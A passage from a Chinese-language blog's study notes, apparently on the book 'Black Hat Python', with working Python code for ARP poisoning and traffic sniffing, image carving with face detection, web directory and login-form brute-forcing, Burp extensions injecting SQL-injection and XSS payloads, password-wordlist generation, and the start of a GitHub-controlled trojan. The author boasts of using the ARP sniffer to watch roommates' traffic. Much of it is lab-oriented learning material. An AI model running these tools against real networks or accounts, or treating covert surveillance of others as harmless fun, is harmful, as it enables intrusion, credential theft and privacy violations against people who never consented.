  14. send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
  15. send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
  16. # 发出退出信号到主线程
  17. os.kill(os.getpid(), signal.SIGINT)
  18. def get_mac(ip_address):
  19. # srp函数(发送和接收数据包,发送指定ARP请求到指定IP地址,然后从返回的数据中获取目标ip的mac)
  20. responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address), timeout=2, retry=10)
  21. # 返回从响应数据中获取的MAC地址
  22. for s,r in responses:
  23. return r[Ether].src
  24. return None
  25. def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
  26. # 构建欺骗目标的ARP请求(),这里没设置hwsrc,默认就是本机咯
  27. # 简单来说:告诉被攻击机器,本机(攻击机)的mac是网关,就是攻击者的机器是网关
  28. poison_target = ARP()
  29. poison_target.op = 2 # 响应报文
  30. poison_target.psrc = gateway_ip # 模拟是网关发出的, 其实是我们的机器发出的
  31. poison_target.pdst = target_ip # 目的地是目标机器
  32. poison_target.hwdst = target_mac # 目标的物理地址是目标机器的mac
  33. # 构建欺骗网关的ARP请求(),这里没设置hwsrc,默认就是本机咯
  34. poison_gateway = ARP()
  35. poison_gateway.op = 2 # 响应报文
  36. poison_gateway.psrc = target_ip # 模拟是目标机器发出的,
  37. poison_gateway.pdst = gateway_ip # 目的地是网关
  38. poison_gateway.hwdst = gateway_mac # 目标的物理地址是网关的mac
  39. print "[*] Beginning the ARP poison. [CTRL_C to stop]"
  40. while True:
  41. try:
  42. # 开始发送ARP欺骗包(投毒)
  43. send(poison_target)
  44. send(poison_gateway)
  45. # 停两秒
  46. time.sleep(2)
  47. except KeyboardInterrupt:
  48. restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
  49. print "[*] ARP poison attack finished"
  50. return
  51. # 设置嗅探的网卡
  52. conf.iface = interface
  53. # 关闭输出
  54. conf.verb = 0
  55. print "[*] Setting up %s" % interface
  56. # 获取网关mac
  57. gateway_mac = get_mac(gateway_ip)
  58. if gateway_mac is None:
  59. print "[!!!] Failed to get gateway MAC. Exiting"
  60. sys.exit(0)
  61. else:
  62. print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
  63. # 获取目标(被攻击的机器)mac
  64. target_mac = get_mac(target_ip)
  65. if target_mac is None:
  66. print "[!!!] Failed to get target MAC. Exiting"
  67. sys.exit(0)
  68. else:
  69. print "[*] Target %s is at %s" % (target_ip, target_mac)
  70. # 启动ARP投毒(欺骗)线程
  71. poison_thread = threading.Thread(target = poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
  72. poison_thread.start()
  73. try:
  74. print "[*] Starting sniffer for %d packets" % packet_count
  75. bpf_filter = "ip host %s " % target_ip # 过滤器
  76. packets = sniff(count = packet_count, filter=bpf_filter, iface = interface)
  77. # 将捕获到的数据包输出到文件
  78. wrpcap("arper.pcap", packets)
  79. # 还原网络配置
  80. restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
  81. except KeyboardInterrupt:
  82. # 还原网络配置
  83. restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
  84. sys.exit(0)


kali (攻击机)

 

winxp(被攻击机)

 

开始攻击

 

攻击结果:网关的ip已被替换成kali的mac了,有趣哦

 

还窃听到了目标机的网络数据流量,哈哈,用于宿舍,舍友的一举一动都知道了

 

 

从pcap文件中提取图片,同时进行人脸识别

安装opencv

 

apt-get install python-opencv python-numpy python-scipy


代码

 

 

  1. #-*- coding:utf8 -*-
  2. import re
  3. import zlib
  4. import cv2
  5. from scapy.all import *
  6. pictures_directory = "./pictures/"
  7. faces_directory = "./faces/"
  8. pcap_file = "test.pcap"
  9. def get_http_headers(http_payload):
  10.     try:
  11.         #如果为http流量,提取http头
  12.         headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]
  13.         #对http头进行切分
  14.         headers = dict(re.findall(r"(?P<name>.*?):(?P<value>.*?)\r\n", headers_raw))
  15.     except:
  16.         return None
  17.     if "Content-Type" not in headers:
  18.         return None
  19.     return headers
  20. def extract_image(headers, http_payload):
  21.     image = None
  22.     image_type = None
  23.     try:
  24.         if "image" in headers['Content-Type']:
  25.             #获取图像类型和图像数据
  26.             image_type = headers['Content-Type'].split("/")[1]
  27.             image = http_payload[http_payload.index("\r\n\r\n")+4:]
  28.             #如果数据进行了压缩则解压
  29.             try:
  30.                 if "Content-Encoding" in headers.keys():
  31.                     if headers['Content-Encoding'] == "gzip":
  32.                         image = zlib.decompress(image, 16+zlib.MAX_WBITS)
  33.                     elif headers['Content-Encoding'] == "deflate":
  34.                         image = zlib.decompress(image)
  35.             except:
  36.                 pass
  37.     except:
  38.         return None, None
  39.     return image,image_type
  40. def face_detect(path, file_name):
  41.     img = cv2.imread(path)
  42.     cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
  43.     rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))
  44.     if len(rects) == 0:
  45.         return False
  46.     rects[:, 2:] += rects[:, :2]
  47.     #对图像中的人脸进行高亮的显示处理
  48.     for x1, y1, x2, y2 in rects:
  49.         cv2.rectangle(img, (x1,y1), (x2,y2), (127,255,0), 2)
  50.     cv2.imwrite("%s/%s-%s" (faces_directory, pcap_file, file_name), img)
  51.     return True
  52. def http_assembler(pcap_file):
  53.     carved_images = 0
  54.     faces_detected = 0
  55.     a = rdpcap(pcap_file)
  56.     sessions = a.sessions()
  57.     for session in sessions:
  58.         http_payload = ""
  59.         for packet in sessions[session]:
  60.             try:
  61.                 if packet[TCP].dport == 80 or packet[TCP].sport == 80:
  62.                     # 对数据组包
  63.                     http_payload += str(packet[TCP].payload)
  64.             except:
  65.                 pass
  66.         headers = get_http_headers(http_payload)
  67.         if headers is None:
  68.             continue
  69.         image, image_type = extract_image(headers, http_payload)
  70.         if image is not None and image_type is not None:
  71.             # 存储图像
  72.             file_name = "%s-pic_carver_%d.%s" % (pcap_file, carved_images, image_type)
  73.             fd = open("%s/%s" % (pictures_directory, file_name), "wb")
  74.             fd.write(image)
  75.             fd.close()
  76.             carved_images += 1
  77.             #开始人脸识别
  78.             try:
  79.                 result = face_detect("%s/%s" % (pictures_directory, file_name), file_name)
  80.                 if result is True:
  81.                     faces_detected += 1
  82.             except:
  83.                 pass
  84.     return carved_images, faces_detected
  85. carved_images, faces_detected = http_assembler(pcap_file)
  86. print "Extracted: %d images" % carved_images
  87. print "Detected: %d faces" % faces_detected

 

运行结果:(test.pcap是我访问百度图片抓的包,但真么没人脸的图片呢,我记得好像有的啊)

 

 

第五章 Web攻击

Web的套接字函数库:urllib2

下面为他们的简单使用

 

有时要根据你要抓取的网站的编码和自己代码的编码相对应

 

Web开源应用的安装

这里作者应该是利用开源应用的本地文件目录信息去访问目标网站的对应目录,看看哪些目录是跟官方的一样的,举个例子:比如有没有install目录

 

  1. #-*- coding:utf8 -*-
  2. import Queue
  3. import threading
  4. import os
  5. import urllib2
  6. threads = 10
  7. target = "http://192.168.1.105/Joomla/"
  8. directory = "./Joomla/"
  9. filters = ["jpg", ".gif", ".png", ".css"]
  10. os.chdir(directory)
  11. web_paths = Queue.Queue()
  12. for r,d,f in os.walk("."):
  13. for files in f:
  14. remote_path = "%s%s" % (r,files)
  15. if remote_path.startswith("."):
  16. remote_path = remote_path[1:]
  17. if os.path.splitext(files)[1] not in filters:
  18. web_paths.put(remote_path)
  19. def test_remote():
  20. while not web_paths.empty():
  21. path = web_paths.get()
  22. url = "%s%s" % (target, path)
  23. request = urllib2.Request(url)
  24. try:
  25. response = urllib2.urlopen(request)
  26. content = response.read()
  27. print "[%d] => %s" % (response.code, path)
  28. response.close()
  29. except urllib2.HTTPError as error:
  30. print "Failed %s" % error.code
  31. pass
  32. for i in range(threads):
  33. print "Spawning thread %d" % i
  34. t = threading.Thread(target=test_remote)
  35. t.start()

 

 

我在真实机上安装了Joola3.4.8,跟着用虚拟机的kali去测试


 

暴力破解Web应用目录和文件

代码:

  1. #-*- coding:utf8 -*-
  2. import urllib2
  3. import threading
  4. import Queue
  5. import urllib
  6. threads = 50
  7. target_url = "http://testphp.vulnweb.com"
  8. wordlist_file = "./all.txt"
  9. resume = None #作者说用于网络中断时,延续上一个尝试的字符串,而不用从头开始,这里好像没用到
  10. user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"
  11. def built_wordlist(wordlist_file):
  12. #读入字典文件
  13. fd = open(wordlist_file, "rb")
  14. raw_words = fd.readlines()
  15. fd.close()
  16. found_resume = False
  17. words = Queue.Queue()
  18. for word in raw_words:
  19. #删除字符串末尾的空格
  20. word = word.rstrip()
  21. #如果是延续上一次
  22. if resume is not None:
  23. if found_resume:
  24. words.put(word)
  25. else:
  26. if word == resume:
  27. found_resume = True
  28. print "Resuming wordlist from: %s" % resume
  29. else:
  30. words.put(word)
  31. return words
  32. def dir_bruter(word_queue, extentsions=None):
  33. while not word_queue.empty():
  34. attempt = word_queue.get()
  35. #用于储存要尝试的url
  36. attempt_list = []
  37. #检查是否有文件扩展名,如果没有就是我们要爆破路径,否则爆破文件
  38. if "." not in attempt:
  39. attempt_list.append("/%s/" % attempt)
  40. else:
  41. attempt_list.append("/%s" % attempt)
  42. #如果我们想暴力破解扩展名
  43. if extentsions:
  44. for extentsion in extentsions:
  45. attempt_list.append("/%s%s" % (attempt, extentsion))
  46. #迭代我们要尝试的文件列表
  47. for brute in attempt_list:
  48. #构造url
  49. url = "%s%s" % (target_url, urllib.quote(brute))
  50. #print url
  51. try:
  52. headers = {}
  53. headers['User-Agent'] = user_agent
  54. r = urllib2.Request(url, headers=headers)
  55. response = urllib2.urlopen(r)
  56. #print response.__dict__
  57. if len(response.read()):
  58. print "[%d] => %s" % (response.code, url)
  59. #用e接收URLError的信息
  60. except urllib2.URLError,e:
  61. # code属性存在,并且code不是404
  62. if hasattr(e, 'code') and e.code != 404:
  63. print "!!! %d => %s" % (e.code, url)
  64. pass
  65. word_queue = built_wordlist(wordlist_file)
  66. extentsions = [".php", ".bak", ".orig",".inc"]
  67. #开启多线程扫描
  68. for i in range(threads):
  69. t = threading.Thread(target=dir_bruter, args=(word_queue, extentsions))
  70. t.start()

 

这里我学习到了一个方法,如果不知道一个对象有什么属性的时候,就 print  该对象.__dict__

运行结果(下面倒数第六行是手贱,焦点没回到真实机就按了截图的快捷键,不过也没什么影响)

 

暴力破解HTML表格认证

既然说到这就说说怎么防范吧:

 

1.一个强大的用户名和密码,你的用户名让他猜不着,就已经很难突破了,为了安全起见,强大的密码也是必须的
2.我们都知道很多网站登录都有验证码,一个强大的验证码咯,不然被识别了(这应该是数字图像的内容了)
3.限制尝试登陆的次数
4.限定ip登陆
5.安装个安全狗什么?(这个随便说的,好像不行,防万能密码应该可以)
6.使用一个随机生成的token [当客户端请求页面时,服务器会生成一个随机数Token,并且将Token放置到session{为了省资源也有储存在cookie中的}当中,然后将Token发给客户端(一般通过构造hidden表单)。下次客户端提交请求时,Token会随着表单一起提交到服务器端。]

 

 

 

好,进入正题,首先当然是研究表单的源码

这四个隐藏的元素也要提交,不然100%不能登陆,最后那个MD5似的应该就是token,同时可看到提交地址:index.php,它同时处理登陆

 

作者给出的步骤如下:

 

1.检索登录页面,接收所有返回的cookie
2.从HTML中获取所有表单yuans
3.在字典中设置需要猜测的用户名和密码
4.发送HTTP POST数据包到登陆处理脚本,数据包含所有HTML表单元素值和cookie值
5.测试是否登陆成功

 

 

代码:

 

  1. #-*- coding:utf8 -*-
  2. import urllib2
  3. import urllib
  4. import cookielib
  5. import threading
  6. import sys
  7. import Queue
  8. from HTMLParser import HTMLParser
  9. #简要设置
  10. user_thread = 10
  11. username ="giantbranch"
  12. wordlist_file ="./mydict.txt"
  13. resume = None
  14. #特点目标设置
  15. target_url = "http://192.168.1.105/Joomla/administrator/index.php"
  16. target_post = "http://192.168.1.105/Joomla/administrator/index.php"
  17. username_field = "username"
  18. password_field = "passwd"
  19. #登陆成功后,title里面就有下面的文字,注意是语言是英文才是下面的哦 
  20. success_check = "Administration - Control Panel"
  21. class BruteParser(HTMLParser):
  22. def __init__(self):
  23. HTMLParser.__init__(self)
  24. self.tag_results = {}
  25. #当我们调用feed函数时,他将整个HTML文档传递进来并在遇到每个标签时调用下面这个函数(根据函数名就容易理解)
  26. def handle_starttag(self, tag, attrs):
  27. #判断是否是input标签
  28. if tag == "input":
  29. tag_name = None
  30. tag_value = None
  31. for name,value in attrs:
  32. #input标签里面不是有name,value,type等属性吗,这里只判断name和value
  33. #不过我觉得第二个if是多余的
  34. if name == "name":
  35. tag_name = value
  36. if name == "value":
  37. tag_value = value
  38. if tag_name is not None:
  39. self.tag_results[tag_name] = value
  40. class Bruter(object):
  41. def __init__(self, username, words):
  42. self.username = username
  43. self.password_q = words
  44. self.found = False
  45. print "Finished setting up for %s" % username
  46. def run_bruteforce(self):
  47. for i in range(user_thread):
  48. t = threading.Thread(target=self.web_bruter)
  49. t.start()
  50. def web_bruter(self):
  51. while not self.password_q.empty() and not self.found:
  52. #从字典获取密码,并去除右边的空格
  53. brute = self.password_q.get().rstrip()
  54. #使用FileCookieJar类,将cookie值储存到文件,参数为文件名,可用于存取cookie
  55. jar = cookielib.FileCookieJar("cookies")
  56. #用上面的jar初始化urllib2打开器,这样下面请求url时,就会把cookie值存到那个文件中
  57. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
  58. response =opener.open(target_url)
  59. page = response.read()
  60. print "Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())
  61. #解析隐藏区域(表单)
  62. parser = BruteParser()
  63. parser.feed(page)
  64. #已经含有隐藏表单的键值
  65. post_tags = parser.tag_results
  66. #添加我们的用户名和密码区域
  67. post_tags[username_field] = self.username
  68. post_tags[password_field] = brute
  69. #输出post的数据(键值)
  70. # for key,value in post_tags.items():
  71. # print key,':',value
  72. #url编码post的数据,开始尝试登陆
  73. login_data = urllib.urlencode(post_tags)
  74. login_response =opener.open(target_post, login_data)
  75. login_result = login_response.read()
  76. # 判断是否登陆成功
  77. if success_check in login_result:
  78. #设置为True,让循环结束
  79. self.found = True
  80. print "[*] Bruteforce successful."
  81. print "[*] Username: %s" % username
  82. print "[*] Password: %s" % brute
  83. print "[*] Waiting for other threads to exit..."
  84. def built_wordlist(wordlist_file):
  85. #读入字典文件
  86. fd = open(wordlist_file, "rb")
  87. raw_words = fd.readlines()
  88. fd.close()
  89. found_resume = False
  90. words = Queue.Queue()
  91. for word in raw_words:
  92. #删除字符串末尾的空格
  93. word = word.rstrip()
  94. #如果是延续上一次
  95. if resume is not None:
  96. if found_resume:
  97. words.put(word)
  98. else:
  99. if word == resume:
  100. found_resume = True
  101. print "Resuming wordlist from: %s" % resume
  102. else:
  103. words.put(word)
  104. return words
  105. #构造字典
  106. words = built_wordlist(wordlist_file)
  107. #初始化Bruter类
  108. bruter_obj = Bruter(username, words)
  109. #调用run_bruteforce函数
  110. bruter_obj.run_bruteforce()

 

 

 

下面的可能对理解代码有帮助:

cookie没登陆就会有的了,你访问一下百度首页也有,就算你没登陆

下图为访问joomla的首页时的cookie(还没登陆)

登陆后

jar有什么用

作者验证登陆成功用的是title,觉得不是很靠谱

 

 

注:我的测试账号为: giantbranch 密码:test

期间出了不少错误:

1.一个是用户名,自己初始化joomla时设置的超级用户名是giantbranch,结果跟着作者admin了哭

2.跑了很久都没跑出来,正确的账号密码也不会停止骂人

最后将post的数据打印出来才知道,密码域的名字打错了

 

最终运行结果:(只展示部分)

终于成功了大哭羡慕奋斗

 

第六章 扩展Burp

这里应该要首先熟悉使用Brup

配置

下载jython,或者我文章开头的源码码那里有

打开软件,这必须的,一张图秒懂吧~~

 

 

Brup模糊测试

下面两个是Burp的IIntruderPayloadGeneratorFactory类和IIntruderPayloadGenerator的API文档,我们要对这些类进行扩展,重载他们的某些方法

  1. package burp;
  2. /*
  3. * @(#)IIntruderPayloadGeneratorFactory.java
  4. * Copyright PortSwigger Ltd. All rights reserved.
  5. * This code may be used to extend the functionality of Burp Suite Free Edition
  6. * and Burp Suite Professional, provided that this usage does not violate the
  7. * license terms for those products.
  8. //代码用于扩展免费和专业版,但不要违反许可证
  9. */
  10. /*
  11. * Extensions can implement this interface and then call
  12. * <code>IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory()</code>
  13. * to register a factory for custom Intruder payloads.
  14. //告诉我们要调用IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory()函数去注册,这样Intruder才能生成攻击载荷
  15. */
  16. public interface IIntruderPayloadGeneratorFactory
  17. {
  18. /**
  19. * This method is used by Burp to obtain the name of the payload generator.
  20. * This will be displayed as an option within the Intruder UI when the user
  21. * selects to use extension-generated payloads.
  22. * @return The name of the payload generator.
  23. */
  24. //这函数就是返回payload发生器的名称
  25. String getGeneratorName();
  26. /*
  27. * This method is used by Burp when the user starts an Intruder attack that
  28. * uses this payload generator.
  29. //用于用户开始Intruder攻击时使用这个payload发生器
  30. *
  31. //参数
  32. * @param attack An
  33. * <code>IIntruderAttack</code> object that can be queried to obtain details
  34. * about the attack in which the payload generator will be used.
  35. //返回值
  36. * @return A new instance of
  37. * <code>IIntruderPayloadGenerator</code> that will be used to generate
  38. * payloads for the attack.
  39. IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack);
  40. }
  1. package burp;
  2. /*
  3. * @(#)IIntruderPayloadGenerator.java
  4. * Copyright PortSwigger Ltd. All rights reserved.
  5. * This code may be used to extend the functionality of Burp Suite Free Edition
  6. * and Burp Suite Professional, provided that this usage does not violate the
  7. * license terms for those products.
  8. */
  9. /**
  10. * This interface is used for custom Intruder payload generators. Extensions
  11. * that have registered an
  12. * <code>IIntruderPayloadGeneratorFactory</code> must return a new instance of
  13. * this interface when required as part of a new Intruder attack.
  14. */
  15. public interface IIntruderPayloadGenerator
  16. {
  17. /*
  18. //这个函数用于决定是否提供更多的payload,就是还有没有咯
  19. * This method is used by Burp to determine whether the payload generator is
  20. * able to provide any further payloads.
  21. *
  22. //返回值
  23. * @return Extensions should return
  24. * <code>false</code> when all the available payloads have been used up,
  25. * otherwise
  26. * <code>true</code>.
  27. */
  28. boolean hasMorePayloads();
  29. /*
  30. //这函数用于获得下一个payload
  31. * This method is used by Burp to obtain the value of the next payload.
  32. * @param baseValue The base value of the current payload position. This
  33. * value may be
  34. * <code>null</code> if the concept of a base value is not applicable (e.g.
  35. * in a battering ram attack).
  36. * @return The next payload to use in the attack.
  37. */
  38. byte[] getNextPayload(byte[] baseValue);
  39. /*
  40. //这函数用于重置payload发生器,就是重置后,回头从第一个payload开始尝试
  41. * This method is used by Burp to reset the state of the payload generator
  42. * so that the next call to
  43. * <code>getNextPayload()</code> returns the first payload again. This
  44. * method will be invoked when an attack uses the same payload generator for
  45. * more than one payload position, for example in a sniper attack.
  46. */
  47. void reset();
  48. }

 

代码:

 

  1. #-*- coding:utf8 -*-
  2. # 导入三个类,其中IBurpExtender类是编写扩展工具必须的类,后两个是Intruder的,我们就是要扩展它
  3. from burp import IBurpExtender
  4. from burp import IIntruderPayloadGeneratorFactory
  5. from burp import IIntruderPayloadGenerator
  6. from java.util import List, ArrayList
  7. import random
  8. #定义自己的BurpExtender类,继承和扩展IBurpExtender和IIntruderPayloadGeneratorFactory类
  9. class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory):
  10. def registerExtenderCallbacks(self, callbacks):
  11. self._callbacks = callbacks
  12. self._helpers = callbacks.getHelpers()
  13. #用registerIntruderPayloadGeneratorFactory函数注册BurpExtender类,这样Intruder才能生成攻击载荷
  14. callbacks.registerIntruderPayloadGeneratorFactory(self)
  15. return
  16. #返回载荷生成器的名称
  17. def getGeneratorName(self):
  18. return "BHP Payload Generator"
  19. # 接受攻击相关参数,返回IIntruderPayloadGenerator类型的实例,作者将他命名为BHPFuzzer
  20. def createNewInstance(self, attack):
  21. return BHPFuzzer(self, attack)
  22. # 定义BHPFuzzer类,扩展了IIntruderPayloadGenerator类
  23. # 增加了max_payload(最大的payload), num_iterations(迭代次数)两个变量,用于控制模糊测试的次数
  24. class BHPFuzzer(IIntruderPayloadGenerator):
  25. def __init__(self, extender, attack):
  26. self._extender = extender
  27. self._helpers = extender._helpers
  28. self._attack = attack
  29. self.max_payload = 1000
  30. self.num_iterations = 0
  31. return
  32. # 通过比较判断迭代是否达到上限
  33. def hasMorePayloads(self):
  34. if self.num_iterations == self.max_payload:
  35. return False
  36. else:
  37. return True
  38. # 接受原始的HTTP负载,current_payload是数组,转化成字符串,传递给模糊测试函数mutate_payload
  39. def getNextPayload(self, current_payload):
  40. # 转换成字符串
  41. payload = "".join(chr(x) for x in current_payload)
  42. # 调用简单的变形器对POST请求进行模糊测试
  43. payload = self.mutate_payload(payload)
  44. # 增加FUZZ的次数
  45. self.num_iterations += 1
  46. return payload
  47. # 重置
  48. def reset(self):
  49. self.num_iterations = 0
  50. return
  51. def mutate_payload(self, original_payload):
  52. # 仅生成随机数或者调用一个外部脚本
  53. picker = random.randint(1,3)
  54. # 再载荷中选取一个随机的偏移量去变形
  55. offset = random.randint(0, len(original_payload)-1)
  56. payload = original_payload[:offset]
  57. # 在随机偏移位置插入SQL注入尝试
  58. if picker == 1:
  59. payload += "'"
  60. # 插入跨站尝试
  61. if picker == 2:
  62. payload += "<script>alert('xss');</script>"
  63. # 随机重复原始载荷
  64. if picker == 3:
  65. chunk_length = random.randint(len(payload[offset:]), len(payload)-1)
  66. repeater = random.randint(1,10)
  67. for i in range(repeater):
  68. payload += original_payload[offset:offset+chunk_length]
  69. # 添加载荷中剩余的字节
  70. payload += original_payload[offset:]
  71. return payload

 

加载我们写的python

加载成功Loaded会打钩

设置本地8080代理,搜索栏输入test,具体看图吧~

 

可以看出应该存在sql注入,

 

在Burp中利用Bing服务

获取Bing API密钥

https://datamarket.azure.com/dataset/bing/search

 

参考:http://wcf1987.iteye.com/blog/1775433  ,注意地区的选择

 

 

代码

  1. #-*- coding:utf8 -*-
  2. from burp import IBurpExtender
  3. from burp import IContextMenuFactory
  4. from javax.swing import JMenuItem
  5. from java.util import List, ArrayList
  6. from java.net import URL
  7. import socket
  8. import urllib
  9. import json
  10. import re
  11. import base64
  12. bing_api_key = "这里用你的密钥"
  13. class BurpExtender(IBurpExtender, IContextMenuFactory):
  14. def registerExtenderCallbacks(self,callbacks):
  15. self._callbacks = callbacks
  16. self._helpers = callbacks.getHelpers()
  17. self.context = None
  18. # 我们建立起扩展工具
  19. callbacks.setExtensionName("Use Bing")
  20. callbacks.registerContextMenuFactory(self)
  21. return
  22. # 创建菜单并处理点击事件,就是actionPerformed那里,点击调用bing_menu函数
  23. def createMenuItems(self, context_menu):
  24. self.context = context_menu
  25. menu_list = ArrayList()
  26. menu_list.add(JMenuItem("Send to Bing", actionPerformed=self.bing_menu))
  27. return menu_list
  28. def bing_menu(self, event):
  29. # 获取用户点击的详细信息
  30. http_traffic = self.context.getSelectedMessages()
  31. print "%d requests highlighted" % len(http_traffic)
  32. # 获取ip或主机名(域名)
  33. for traffic in http_traffic:
  34. http_service = traffic.getHttpService()
  35. host = http_service.getHost()
  36. print "User selected host: %s" % host
  37. self.bing_search(host)
  38. return
  39. def bing_search(self, host):
  40. # 检查参数是否为ip地址或主机名(域名)------使用正则
  41. is_ip = re.match("[0-9]+(?:\.[0-9]+){3}", host)
  42. # 若为ip
  43. if is_ip:
  44. ip_address = host
  45. domain = False
  46. else:
  47. ip_address = socket.gethostbyname(host)
  48. domain = True
  49. # 查寻同一ip是否存在不同虚拟机
  50. bing_query_string ="'ip:%s'" % ip_address
  51. self.bing_query(bing_query_string)
  52. # 若为域名则执行二次搜索,搜索子域名
  53. if domain:
  54. bing_query_string = "'domain:%s'" % host
  55. self.bing_query(bing_query_string)
  56. def bing_query(self, bing_query_string):
  57. print "Performing Bing search: %s" % bing_query_string
  58. # 编码我们的查询(如 urllib.quote('ab c')--> 'ab%20c')
  59. quoted_query = urllib.quote(bing_query_string)
  60. http_request = "GET https://api.datamarket.azure.com/Bing/Search/Web?$format=json&$top=20&Query=%s HTTP/1.1\r\n" % quoted_query
  61. http_request += "Host: api.datamarket.azure.com\r\n"
  62. http_request += "Connection: close\r\n"
  63. # 对API密钥使用base64编码
  64. http_request += "Authorization: Basic %s\r\n" % base64.b64encode(":%s" % bing_api_key)
  65. http_request += "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36\r\n\r\n"
  66. json_body = self._callbacks.makeHttpRequest("api.datamarket.azure.com", 443, True, http_request).tostring()
  67. # 去掉HTTP响应头,只取正文
  68. json_body = json_body.split("\r\n\r\n", 1)[1]
  69. #print json_body
  70. try:
  71. # 传递给json解析器
  72. r = json.loads(json_body)
  73. # 输出查询到的网站的相关信息
  74. if len(r["d"]["results"]):
  75. for site in r["d"]["results"]:
  76. print "*" * 100
  77. print site['Title']
  78. print site['Url']
  79. print site['Description']
  80. print "*" * 100
  81. j_url = URL(site['Url'])
  82. # 如果网站不在brup的目标列表中,就添加进去
  83. if not self._callbacks.isInScope(j_url):
  84. print "Adding to Burp scope"
  85. self._callbacks.includeInScope(j_url)
  86. except:
  87. print "No results from Bing"
  88. pass
  89. return

 

加载扩展步骤同上

 

跟着的话,send to bing

 

但又有问题了,没结果

 

将返回的页面打印出来,发现没权限或者身份问题,一开始以为是证书,结果不是

 

 

再次浏览bing API,觉得是这个的问题,其实当时一开始打开这个网站就知道有点问题

 

 

 

于是就改成香港的,估计改成其他地区也能行,最重要你能看懂文字

 

再次实验 ,ko!!!!!!!!!!!!难过奋斗

 

利用网站内容生成密码字典

代码

  1. #-*- coding:utf8 -*-
  2. from burp import IBurpExtender
  3. from burp import IContextMenuFactory
  4. from javax.swing import JMenuItem
  5. from java.util import List, ArrayList
  6. from java.net import URL
  7. import re
  8. from datetime import datetime
  9. from HTMLParser import HTMLParser
  10. #
  11. class TagStripper(HTMLParser):
  12. def __init__(self):
  13. HTMLParser.__init__(self)
  14. self.page_text = []
  15. # 遇到两个标签之间的数据时调用
  16. def handle_data(self, data):
  17. self.page_text.append(data)
  18. # 遇到注释时调用
  19. def handle_comment(self, data):
  20. self.handle_data(data)
  21. def strip(self,html):
  22. # 会调用上面的两个函数
  23. self.feed(html)
  24. return "".join(self.page_text)
  25. class BurpExtender(IBurpExtender, IContextMenuFactory):
  26. def registerExtenderCallbacks(self,callbacks):
  27. self._callbacks = callbacks
  28. self._helpers = callbacks.getHelpers()
  29. self.context = None
  30. self.hosts = set()
  31. # 按部就班,先设定一个非常常见的密码,因为是字典,不能重复最好,所以用集合
  32. self.wordlist = set(["password"])
  33. # 建立起我们的扩展工具
  34. callbacks.setExtensionName("Build Wordlist")
  35. callbacks.registerContextMenuFactory(self)
  36. return
  37. # 添加菜单
  38. def createMenuItems(self, context_menu):
  39. self.context = context_menu
  40. menu_list = ArrayList()
  41. menu_list.add(JMenuItem("Bulid Wordlist", actionPerformed=self.wordlist_menu))
  42. return menu_list
  43. def wordlist_menu(self, event):
  44. # 抓取用户点击细节
  45. http_traffic = self.context.getSelectedMessages()
  46. # 获取ip或主机名(域名)
  47. for traffic in http_traffic:
  48. http_service = traffic.getHttpService()
  49. host = http_service.getHost()
  50. self.hosts.add(host)
  51. # 获取网站的返回信息
  52. http_response = traffic.getResponse()
  53. # 若有回应就调用get_word
  54. if http_response:
  55. self.get_words(http_response)
  56. self.display_wordlist()
  57. return
  58. def get_words(self, http_response):
  59. headers, body = http_response.tostring().split("\r\n\r\n", 1)
  60. # 忽略下一个请求
  61. if headers.lower().find("content-type: text") == -1:
  62. return
  63. # 获取标签中的文本
  64. tag_stripper = TagStripper()
  65. page_text = tag_stripper.strip(body)
  66. # 匹配第一个是字母的,后面跟着的是两个以上的字母,数字或下划线/
  67. words = re.findall("[a-zA-Z]\w{2,}", page_text)
  68. # 感觉这里的长度有点短啊,作者是12,我改成15了
  69. for word in words:
  70. # 过滤长字符串
  71. if len(word) <= 15:
  72. self.wordlist.add(word.lower())
  73. return
  74. # 再后面添加更多的猜测
  75. def mangle(self, word):
  76. year = datetime.now().year
  77. suffixes = ["", "1", "!", year]
  78. mangled = []
  79. for password in (word, word.capitalize()):
  80. for suffix in suffixes:
  81. mangled.append("%s%s" % (password, suffix))
  82. return mangled
  83. def display_wordlist(self):
  84. print "#!comment: BHP Wordlist for site(s) %s" % ", ".join(self.hosts)
  85. for word in sorted(self.wordlist):
  86. for password in self.mangle(word):
  87. print password
  88. return

 

 

 

第七章 基于GitHub的命令和控制

GitHub账号设置

安装Github API库

pip install github3.py

 

首先你要去github注册个账号吧

 

 

跟着初始化本地环境,因为我本来就初始化好了,跟课本有所不同,直接上图好了,我就在我分享的源代码里面chapter7里面直接加目录就行了(如果你没用过github,建议先去学习学习)

 

创建模块

在modules目录创建了两文件(就是下图的两个文件),为了减少篇幅,查看代码和注释请到github上看

 

木马配置

配置文件为一个json文件,里面的信息包含了我们添加的模块

 

 

编写基于github的通信木马

代码:

  1. #-*- coding:utf8 -*-
  2. import json
  3. import base64
  4. import sys
  5. import time
  6. import imp
  7. import random
  8. import threading
  9. import Queue
  10. import os
  11. from github3 import login
  12. trojan_id = "abc"
  13. trojan_config = "%s.json" % trojan_id
  14. data_path = "chapter7/data/%s/" % trojan_id
  15. trojan_modules = []
  16. configured = False
  17. task_queue = Queue.Queue()
  18. # 通过账号密码连接到github,获取repo和branch
  19. def connect_to_github():
